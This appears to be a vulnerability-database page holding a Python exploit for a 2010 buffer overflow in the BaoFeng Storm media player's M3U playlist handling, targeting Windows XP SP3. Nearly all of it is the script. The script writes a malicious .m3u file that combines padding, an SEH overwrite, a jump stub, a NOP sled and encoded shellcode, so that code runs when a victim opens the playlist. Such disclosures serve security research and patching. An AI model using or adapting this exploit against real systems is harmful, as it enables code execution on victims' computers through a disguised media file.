BaoFeng Storm M3U File Processing Buffer Overflow Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType

BaoFeng Storm M3U File Processing Buffer Overflow Exploit CNVD-ID: CNVD-2010-00752, Windows XPSP3 Chinese Simplified, Vulnerable: Storm201


                                                #!/usr/bin/env python

#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Author: Lufeng Li and Qingshan Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
# Storm2012 3.10.4.16
# Storm2012 3.10.4.8
# Storm2012 3.10.3.17
# Storm2012 3.10.2.5
# Storm2012 3.10.1.12
#################################################################
# Code :
file= &#34;baofeng.m3u&#34;
junk =&#34;\x41&#34;*795
nseh=&#34;\x61\xe8\xe1&#34;
seh=&#34;\xaa\xd7\x40&#34;

jmp =&#34;\x53\x53\x6d\x58\x6d\x05\x11\x22\x6d\x2d\x10\x22\x6d\xac\xe4&#34;
nops =&#34;\x42&#34; * 110
shellcode=(&#34;PPYAIAIAIAIAQATAXAZAPA3QADAZA&#34;
&#34;BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA&#34;
&#34;58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB&#34;
&#34;AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K&#34;
&#34;22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL&#34;
&#34;MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55&#34;
&#34;Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V&#34;
&#34;NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB&#34;
&#34;R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT&#34;
&#34;NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU&#34;
&#34;89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM&#34;
&#34;KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC&#34;
&#34;QQ2LRCM0LJA&#34;)

fobj=open(file,&#34;w&#34;)
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1